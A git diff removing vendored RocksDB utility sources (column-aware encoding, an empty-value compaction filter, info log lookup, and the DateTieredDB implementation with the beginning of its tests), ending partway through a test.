-      slice_final_with_bit[slice_final.size()] = static_cast<char>(type);
-      blocks->push_back(std::string(slice_final_with_bit.data(),
-                                    slice_final_with_bit.size()));
-    }
-  }
-
-  if (print_column_stat) {
-    size_t total_size = 0;
-    for (size_t i = 0; i < key_col_sizes.size(); ++i)
-      total_size += key_col_sizes[i];
-    for (size_t i = 0; i < value_col_sizes.size(); ++i)
-      total_size += value_col_sizes[i];
-    total_size += value_checksum_size;
-
-    for (size_t i = 0; i < key_col_sizes.size(); ++i)
-      printf("Key col %" ROCKSDB_PRIszt " size: %" ROCKSDB_PRIszt " percentage %lf%%\n", i, key_col_sizes[i],
-             100.0 * key_col_sizes[i] / total_size);
-    for (size_t i = 0; i < value_col_sizes.size(); ++i)
-      printf("Value col %" ROCKSDB_PRIszt " size: %" ROCKSDB_PRIszt " percentage %lf%%\n", i,
-             value_col_sizes[i], 100.0 * value_col_sizes[i] / total_size);
-    printf("Value checksum size: %" ROCKSDB_PRIszt " percentage %lf%%\n", value_checksum_size,
-           100.0 * value_checksum_size / total_size);
-  }
-  return Status::OK();
-}
-
-void ColumnAwareEncodingReader::GetColDeclarationsPrimary(
-    std::vector<ColDeclaration>** key_col_declarations,
-    std::vector<ColDeclaration>** value_col_declarations,
-    ColDeclaration** value_checksum_declaration) {
-  *key_col_declarations = new std::vector<ColDeclaration>{
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4, false,
-                     true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8)};
-
-  *value_col_declarations = new std::vector<ColDeclaration>{
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4),
-      ColDeclaration("FixedLength", ColCompressionType::kColRle, 1),
-      ColDeclaration("VariableLength"),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 4),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8)};
-  *value_checksum_declaration = new ColDeclaration(
-      "LongFixedLength", ColCompressionType::kColNoCompression, 9,
-      true /* nullable */);
-}
-
-void ColumnAwareEncodingReader::GetColDeclarationsSecondary(
-    std::vector<ColDeclaration>** key_col_declarations,
-    std::vector<ColDeclaration>** value_col_declarations,
-    ColDeclaration** value_checksum_declaration) {
-  *key_col_declarations = new std::vector<ColDeclaration>{
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4, false,
-                     true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRle, 1),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 4,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8, false,
-                     true),
-      ColDeclaration("VariableChunk", ColCompressionType::kColNoCompression),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8)};
-  *value_col_declarations = new std::vector<ColDeclaration>();
-  *value_checksum_declaration = new ColDeclaration(
-      "LongFixedLength", ColCompressionType::kColNoCompression, 9,
-      true /* nullable */);
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_util.h b/thirdparty/rocksdb/utilities/column_aware_encoding_util.h
deleted file mode 100644
index 385d410..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_util.h
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-#include "db/dbformat.h"
-#include "include/rocksdb/env.h"
-#include "include/rocksdb/listener.h"
-#include "include/rocksdb/options.h"
-#include "include/rocksdb/status.h"
-#include "options/cf_options.h"
-#include "table/block_based_table_reader.h"
-
-namespace rocksdb {
-
-struct ColDeclaration;
-struct KVPairColDeclarations;
-
-class ColumnAwareEncodingReader {
- public:
-  explicit ColumnAwareEncodingReader(const std::string& file_name);
-
-  void GetKVPairsFromDataBlocks(std::vector<KVPairBlock>* kv_pair_blocks);
-
-  void EncodeBlocksToRowFormat(WritableFile* out_file,
-                               CompressionType compression_type,
-                               const std::vector<KVPairBlock>& kv_pair_blocks,
-                               std::vector<std::string>* blocks);
-
-  void DecodeBlocksFromRowFormat(WritableFile* out_file,
-                                 const std::vector<std::string>* blocks);
-
-  void DumpDataColumns(const std::string& filename,
-                       const KVPairColDeclarations& kvp_col_declarations,
-                       const std::vector<KVPairBlock>& kv_pair_blocks);
-
-  Status EncodeBlocks(const KVPairColDeclarations& kvp_col_declarations,
-                      WritableFile* out_file, CompressionType compression_type,
-                      const std::vector<KVPairBlock>& kv_pair_blocks,
-                      std::vector<std::string>* blocks, bool print_column_stat);
-
-  void DecodeBlocks(const KVPairColDeclarations& kvp_col_declarations,
-                    WritableFile* out_file,
-                    const std::vector<std::string>* blocks);
-
-  static void GetColDeclarationsPrimary(
-      std::vector<ColDeclaration>** key_col_declarations,
-      std::vector<ColDeclaration>** value_col_declarations,
-      ColDeclaration** value_checksum_declaration);
-
-  static void GetColDeclarationsSecondary(
-      std::vector<ColDeclaration>** key_col_declarations,
-      std::vector<ColDeclaration>** value_col_declarations,
-      ColDeclaration** value_checksum_declaration);
-
- private:
-  // Init the TableReader for the sst file
-  void InitTableReader(const std::string& file_path);
-
-  std::string file_name_;
-  EnvOptions soptions_;
-
-  Options options_;
-
-  Status init_result_;
-  std::unique_ptr<BlockBasedTable> table_reader_;
-  std::unique_ptr<RandomAccessFileReader> file_;
-
-  const ImmutableCFOptions ioptions_;
-  InternalKeyComparator internal_comparator_;
-  std::unique_ptr<TableProperties> table_properties_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
deleted file mode 100644
index 43a2529..0000000
--- a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
+++ /dev/null
@@ -1,30 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "utilities/compaction_filters/remove_emptyvalue_compactionfilter.h"
-
-namespace rocksdb {
-
-const char* RemoveEmptyValueCompactionFilter::Name() const {
-  return "RemoveEmptyValueCompactionFilter";
-}
-
-bool RemoveEmptyValueCompactionFilter::Filter(int level,
-    const Slice& key,
-    const Slice& existing_value,
-    std::string* new_value,
-    bool* value_changed) const {
-
-  // remove kv pairs that have empty values
-  return existing_value.empty();
-}
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h b/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h
deleted file mode 100644
index b4a389b..0000000
--- a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-
-#include <string>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class RemoveEmptyValueCompactionFilter : public CompactionFilter {
- public:
-    const char* Name() const override;
-    bool Filter(int level,
-        const Slice& key,
-        const Slice& existing_value,
-        std::string* new_value,
-        bool* value_changed) const override;
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/convenience/info_log_finder.cc b/thirdparty/rocksdb/utilities/convenience/info_log_finder.cc
deleted file mode 100644
index 72c4a62..0000000
--- a/thirdparty/rocksdb/utilities/convenience/info_log_finder.cc
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 Facebook.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file.
-
-#include "rocksdb/utilities/info_log_finder.h"
-#include "rocksdb/env.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-Status GetInfoLogList(DB* db, std::vector<std::string>* info_log_list) {
-  uint64_t number = 0;
-  FileType type;
-  std::string path;
-
-  if (!db) {
-    return Status::InvalidArgument("DB pointer is not valid");
-  }
-
-  const Options& options = db->GetOptions();
-  if (!options.db_log_dir.empty()) {
-    path = options.db_log_dir;
-  } else {
-    path = db->GetName();
-  }
-  InfoLogPrefix info_log_prefix(!options.db_log_dir.empty(), db->GetName());
-  auto* env = options.env;
-  std::vector<std::string> file_names;
-  Status s = env->GetChildren(path, &file_names);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  for (auto f : file_names) {
-    if (ParseFileName(f, &number, info_log_prefix.prefix, &type) &&
-        (type == kInfoLogFile)) {
-      info_log_list->push_back(f);
-    }
-  }
-  return Status::OK();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.cc b/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.cc
deleted file mode 100644
index c1b1ceb..0000000
--- a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.cc
+++ /dev/null
@@ -1,396 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef ROCKSDB_LITE
-
-#include "utilities/date_tiered/date_tiered_db_impl.h"
-
-#include <limits>
-
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/write_batch_internal.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/options_helper.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/date_tiered_db.h"
-#include "table/merging_iterator.h"
-#include "util/coding.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// Open the db inside DateTieredDBImpl because options needs pointer to its ttl
-DateTieredDBImpl::DateTieredDBImpl(
-    DB* db, Options options,
-    const std::vector<ColumnFamilyDescriptor>& descriptors,
-    const std::vector<ColumnFamilyHandle*>& handles, int64_t ttl,
-    int64_t column_family_interval)
-    : db_(db),
-      cf_options_(ColumnFamilyOptions(options)),
-      ioptions_(ImmutableCFOptions(options)),
-      ttl_(ttl),
-      column_family_interval_(column_family_interval),
-      mutex_(options.statistics.get(), db->GetEnv(), DB_MUTEX_WAIT_MICROS,
-             options.use_adaptive_mutex) {
-  latest_timebound_ = std::numeric_limits<int64_t>::min();
-  for (size_t i = 0; i < handles.size(); ++i) {
-    const auto& name = descriptors[i].name;
-    int64_t timestamp = 0;
-    try {
-      timestamp = ParseUint64(name);
-    } catch (const std::invalid_argument&) {
-      // Bypass unrelated column family, e.g. default
-      db_->DestroyColumnFamilyHandle(handles[i]);
-      continue;
-    }
-    if (timestamp > latest_timebound_) {
-      latest_timebound_ = timestamp;
-    }
-    handle_map_.insert(std::make_pair(timestamp, handles[i]));
-  }
-}
-
-DateTieredDBImpl::~DateTieredDBImpl() {
-  for (auto handle : handle_map_) {
-    db_->DestroyColumnFamilyHandle(handle.second);
-  }
-  delete db_;
-  db_ = nullptr;
-}
-
-Status DateTieredDB::Open(const Options& options, const std::string& dbname,
-                          DateTieredDB** dbptr, int64_t ttl,
-                          int64_t column_family_interval, bool read_only) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> descriptors;
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* db;
-  Status s;
-
-  // Get column families
-  std::vector<std::string> column_family_names;
-  s = DB::ListColumnFamilies(db_options, dbname, &column_family_names);
-  if (!s.ok()) {
-    // No column family found. Use default
-    s = DB::Open(options, dbname, &db);
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    for (auto name : column_family_names) {
-      descriptors.emplace_back(ColumnFamilyDescriptor(name, cf_options));
-    }
-
-    // Open database
-    if (read_only) {
-      s = DB::OpenForReadOnly(db_options, dbname, descriptors, &handles, &db);
-    } else {
-      s = DB::Open(db_options, dbname, descriptors, &handles, &db);
-    }
-  }
-
-  if (s.ok()) {
-    *dbptr = new DateTieredDBImpl(db, options, descriptors, handles, ttl,
-                                  column_family_interval);
-  }
-  return s;
-}
-
-// Checks if the string is stale or not according to TTl provided
-bool DateTieredDBImpl::IsStale(int64_t keytime, int64_t ttl, Env* env) {
-  if (ttl <= 0) {
-    // Data is fresh if TTL is non-positive
-    return false;
-  }
-  int64_t curtime;
-  if (!env->GetCurrentTime(&curtime).ok()) {
-    // Treat the data as fresh if could not get current time
-    return false;
-  }
-  return curtime >= keytime + ttl;
-}
-
-// Drop column family when all data in that column family is expired
-// TODO(jhli): Can be made a background job
-Status DateTieredDBImpl::DropObsoleteColumnFamilies() {
-  int64_t curtime;
-  Status s;
-  s = db_->GetEnv()->GetCurrentTime(&curtime);
-  if (!s.ok()) {
-    return s;
-  }
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto iter = handle_map_.begin();
-    while (iter != handle_map_.end()) {
-      if (iter->first <= curtime - ttl_) {
-        s = db_->DropColumnFamily(iter->second);
-        if (!s.ok()) {
-          return s;
-        }
-        delete iter->second;
-        iter = handle_map_.erase(iter);
-      } else {
-        break;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-// Get timestamp from user key
-Status DateTieredDBImpl::GetTimestamp(const Slice& key, int64_t* result) {
-  if (key.size() < kTSLength) {
-    return Status::Corruption("Bad timestamp in key");
-  }
-  const char* pos = key.data() + key.size() - 8;
-  int64_t timestamp = 0;
-  if (port::kLittleEndian) {
-    int bytes_to_fill = 8;
-    for (int i = 0; i < bytes_to_fill; ++i) {
-      timestamp |= (static_cast<uint64_t>(static_cast<unsigned char>(pos[i]))
-                    << ((bytes_to_fill - i - 1) << 3));
-    }
-  } else {
-    memcpy(&timestamp, pos, sizeof(timestamp));
-  }
-  *result = timestamp;
-  return Status::OK();
-}
-
-Status DateTieredDBImpl::CreateColumnFamily(
-    ColumnFamilyHandle** column_family) {
-  int64_t curtime;
-  Status s;
-  mutex_.AssertHeld();
-  s = db_->GetEnv()->GetCurrentTime(&curtime);
-  if (!s.ok()) {
-    return s;
-  }
-  int64_t new_timebound;
-  if (handle_map_.empty()) {
-    new_timebound = curtime + column_family_interval_;
-  } else {
-    new_timebound =
-        latest_timebound_ +
-        ((curtime - latest_timebound_) / column_family_interval_ + 1) *
-            column_family_interval_;
-  }
-  std::string cf_name = ToString(new_timebound);
-  latest_timebound_ = new_timebound;
-  s = db_->CreateColumnFamily(cf_options_, cf_name, column_family);
-  if (s.ok()) {
-    handle_map_.insert(std::make_pair(new_timebound, *column_family));
-  }
-  return s;
-}
-
-Status DateTieredDBImpl::FindColumnFamily(int64_t keytime,
-                                          ColumnFamilyHandle** column_family,
-                                          bool create_if_missing) {
-  *column_family = nullptr;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto iter = handle_map_.upper_bound(keytime);
-    if (iter == handle_map_.end()) {
-      if (!create_if_missing) {
-        return Status::NotFound();
-      } else {
-        return CreateColumnFamily(column_family);
-      }
-    }
-    // Move to previous element to get the appropriate time window
-    *column_family = iter->second;
-  }
-  return Status::OK();
-}
-
-Status DateTieredDBImpl::Put(const WriteOptions& options, const Slice& key,
-                             const Slice& val) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    return s;
-  }
-  DropObsoleteColumnFamilies();
-
-  // Prune request to obsolete data
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return Status::InvalidArgument();
-  }
-
-  // Decide column family (i.e. the time window) to put into
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, true /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Efficiently put with WriteBatch
-  WriteBatch batch;
-  batch.Put(column_family, key, val);
-  return Write(options, &batch);
-}
-
-Status DateTieredDBImpl::Get(const ReadOptions& options, const Slice& key,
-                             std::string* value) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    return s;
-  }
-  // Prune request to obsolete data
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return Status::NotFound();
-  }
-
-  // Decide column family to get from
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, false /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-  if (column_family == nullptr) {
-    // Cannot find column family
-    return Status::NotFound();
-  }
-
-  // Get value with key
-  return db_->Get(options, column_family, key, value);
-}
-
-bool DateTieredDBImpl::KeyMayExist(const ReadOptions& options, const Slice& key,
-                                   std::string* value, bool* value_found) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    // Cannot get current time
-    return false;
-  }
-  // Decide column family to get from
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, false /*create_if_missing*/);
-  if (!s.ok() || column_family == nullptr) {
-    // Cannot find column family
-    return false;
-  }
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return false;
-  }
-  return db_->KeyMayExist(options, column_family, key, value, value_found);
-}
-
-Status DateTieredDBImpl::Delete(const WriteOptions& options, const Slice& key) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    return s;
-  }
-  DropObsoleteColumnFamilies();
-  // Prune request to obsolete data
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return Status::NotFound();
-  }
-
-  // Decide column family to get from
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, false /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-  if (column_family == nullptr) {
-    // Cannot find column family
-    return Status::NotFound();
-  }
-
-  // Get value with key
-  return db_->Delete(options, column_family, key);
-}
-
-Status DateTieredDBImpl::Merge(const WriteOptions& options, const Slice& key,
-                               const Slice& value) {
-  // Decide column family to get from
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    // Cannot get current time
-    return s;
-  }
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, true /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-  WriteBatch batch;
-  batch.Merge(column_family, key, value);
-  return Write(options, &batch);
-}
-
-Status DateTieredDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) {
-  class Handler : public WriteBatch::Handler {
-   public:
-    explicit Handler() {}
-    WriteBatch updates_ttl;
-    Status batch_rewrite_status;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      WriteBatchInternal::Put(&updates_ttl, column_family_id, key, value);
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      WriteBatchInternal::Merge(&updates_ttl, column_family_id, key, value);
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      WriteBatchInternal::Delete(&updates_ttl, column_family_id, key);
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      updates_ttl.PutLogData(blob);
-    }
-  };
-  Handler handler;
-  updates->Iterate(&handler);
-  if (!handler.batch_rewrite_status.ok()) {
-    return handler.batch_rewrite_status;
-  } else {
-    return db_->Write(opts, &(handler.updates_ttl));
-  }
-}
-
-Iterator* DateTieredDBImpl::NewIterator(const ReadOptions& opts) {
-  if (handle_map_.empty()) {
-    return NewEmptyIterator();
-  }
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_);
-
-  auto db_iter = NewArenaWrappedDbIterator(
-      db_impl->GetEnv(), opts, ioptions_, kMaxSequenceNumber,
-      cf_options_.max_sequential_skip_in_iterations, 0);
-
-  auto arena = db_iter->GetArena();
-  MergeIteratorBuilder builder(cf_options_.comparator, arena);
-  for (auto& item : handle_map_) {
-    auto handle = item.second;
-    builder.AddIterator(db_impl->NewInternalIterator(
-        arena, db_iter->GetRangeDelAggregator(), handle));
-  }
-  auto internal_iter = builder.Finish();
-  db_iter->SetIterUnderDBIter(internal_iter);
-  return db_iter;
-}
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.h b/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.h
deleted file mode 100644
index 2236cff..0000000
--- a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.h
+++ /dev/null
@@ -1,89 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "monitoring/instrumented_mutex.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/date_tiered_db.h"
-
-namespace rocksdb {
-
-// Implementation of DateTieredDB.
-class DateTieredDBImpl : public DateTieredDB {
- public:
-  DateTieredDBImpl(DB* db, Options options,
-                   const std::vector<ColumnFamilyDescriptor>& descriptors,
-                   const std::vector<ColumnFamilyHandle*>& handles, int64_t ttl,
-                   int64_t column_family_interval);
-
-  virtual ~DateTieredDBImpl();
-
-  Status Put(const WriteOptions& options, const Slice& key,
-             const Slice& val) override;
-
-  Status Get(const ReadOptions& options, const Slice& key,
-             std::string* value) override;
-
-  Status Delete(const WriteOptions& options, const Slice& key) override;
-
-  bool KeyMayExist(const ReadOptions& options, const Slice& key,
-                   std::string* value, bool* value_found = nullptr) override;
-
-  Status Merge(const WriteOptions& options, const Slice& key,
-               const Slice& value) override;
-
-  Iterator* NewIterator(const ReadOptions& opts) override;
-
-  Status DropObsoleteColumnFamilies() override;
-
-  // Extract timestamp from key.
-  static Status GetTimestamp(const Slice& key, int64_t* result);
-
- private:
-  // Base database object
-  DB* db_;
-
-  const ColumnFamilyOptions cf_options_;
-
-  const ImmutableCFOptions ioptions_;
-
-  // Storing all column family handles for time series data.
-  std::vector<ColumnFamilyHandle*> handles_;
-
-  // Manages a mapping from a column family's maximum timestamp to its handle.
-  std::map<int64_t, ColumnFamilyHandle*> handle_map_;
-
-  // A time-to-live value to indicate when the data should be removed.
-  int64_t ttl_;
-
-  // An variable to indicate the time range of a column family.
-  int64_t column_family_interval_;
-
-  // Indicate largest maximum timestamp of a column family.
-  int64_t latest_timebound_;
-
-  // Mutex to protect handle_map_ operations.
-  InstrumentedMutex mutex_;
-
-  // Internal method to execute Put and Merge in batch.
-  Status Write(const WriteOptions& opts, WriteBatch* updates);
-
-  Status CreateColumnFamily(ColumnFamilyHandle** column_family);
-
-  Status FindColumnFamily(int64_t keytime, ColumnFamilyHandle** column_family,
-                          bool create_if_missing);
-
-  static bool IsStale(int64_t keytime, int64_t ttl, Env* env);
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_test.cc b/thirdparty/rocksdb/utilities/date_tiered/date_tiered_test.cc
deleted file mode 100644
index 55e3f62..0000000
--- a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_test.cc
+++ /dev/null
@@ -1,468 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-
-#include <map>
-#include <memory>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/utilities/date_tiered_db.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-namespace {
-
-typedef std::map<std::string, std::string> KVMap;
-}
-
-class SpecialTimeEnv : public EnvWrapper {
- public:
-  explicit SpecialTimeEnv(Env* base) : EnvWrapper(base) {
-    base->GetCurrentTime(&current_time_);
-  }
-
-  void Sleep(int64_t sleep_time) { current_time_ += sleep_time; }
-  virtual Status GetCurrentTime(int64_t* current_time) override {
-    *current_time = current_time_;
-    return Status::OK();
-  }
-
- private:
-  int64_t current_time_ = 0;
-};
-
-class DateTieredTest : public testing::Test {
- public:
-  DateTieredTest() {
-    env_.reset(new SpecialTimeEnv(Env::Default()));
-    dbname_ = test::TmpDir() + "/date_tiered";
-    options_.create_if_missing = true;
-    options_.env = env_.get();
-    date_tiered_db_.reset(nullptr);
-    DestroyDB(dbname_, Options());
-  }
-
-  ~DateTieredTest() {
-    CloseDateTieredDB();
-    DestroyDB(dbname_, Options());
-  }
-
-  void OpenDateTieredDB(int64_t ttl, int64_t column_family_interval,
-                        bool read_only = false) {
-    ASSERT_TRUE(date_tiered_db_.get() == nullptr);
-    DateTieredDB* date_tiered_db = nullptr;
-    ASSERT_OK(DateTieredDB::Open(options_, dbname_, &date_tiered_db, ttl,
-                                 column_family_interval, read_only));
-    date_tiered_db_.reset(date_tiered_db);
-  }
-
-  void CloseDateTieredDB() { date_tiered_db_.reset(nullptr); }
-
-  Status AppendTimestamp(std::string* key) {
-    char ts[8];
-    int bytes_to_fill = 8;
-    int64_t timestamp_value = 0;
-    Status s = env_->GetCurrentTime(&timestamp_value);
-    if (!s.ok()) {
-      return s;
-    }
-    if (port::kLittleEndian) {
-      for (int i = 0; i < bytes_to_fill; ++i) {
-        ts[i] = (timestamp_value >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-      }
-    } else {
-      memcpy(ts, static_cast<void*>(&timestamp_value), bytes_to_fill);
-    }
-    key->append(ts, 8);
-    return Status::OK();
-  }
-
-  // Populates and returns a kv-map
-  void MakeKVMap(int64_t num_entries, KVMap* kvmap) {
-    kvmap->clear();
-    int digits = 1;
-    for (int64_t dummy = num_entries; dummy /= 10; ++digits) {
-    }
-    int digits_in_i = 1;
-    for (int64_t i = 0; i < num_entries; i++) {
-      std::string key = "key";
-      std::string value = "value";
-      if (i % 10 == 0) {
-        digits_in_i++;
-      }
-      for (int j = digits_in_i; j < digits; j++) {
-        key.append("0");
-        value.append("0");
-      }
-      AppendNumberTo(&key, i);
-      AppendNumberTo(&value, i);
-      ASSERT_OK(AppendTimestamp(&key));
-      (*kvmap)[key] = value;
-    }
-    // check all insertions done
-    ASSERT_EQ(num_entries, static_cast<int64_t>(kvmap->size()));
-  }
-
-  size_t GetColumnFamilyCount() {
-    DBOptions db_options(options_);
-    std::vector<std::string> cf;
-    DB::ListColumnFamilies(db_options, dbname_, &cf);
-    return cf.size();
-  }
-
-  void Sleep(int64_t sleep_time) { env_->Sleep(sleep_time); }
-
-  static const int64_t kSampleSize_ = 100;
-  std::string dbname_;
-  std::unique_ptr<DateTieredDB> date_tiered_db_;
-  std::unique_ptr<SpecialTimeEnv> env_;
-  KVMap kvmap_;
-
- private:
-  Options options_;
-  KVMap::iterator kv_it_;
-  const std::string kNewValue_ = "new_value";
-  unique_ptr<CompactionFilter> test_comp_filter_;
-};
-
-// Puts a set of values and checks its presence using Get during ttl
-TEST_F(DateTieredTest, KeyLifeCycle) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  // T=1, keys should still reside in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    ASSERT_OK(date_tiered_db_->Get(ropts, kv.first, &value));
-    ASSERT_EQ(value, kv.second);
-  }
-
-  Sleep(1);
-  // T=2, keys should not be retrieved
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  CloseDateTieredDB();
-}
-
-TEST_F(DateTieredTest, DeleteTest) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
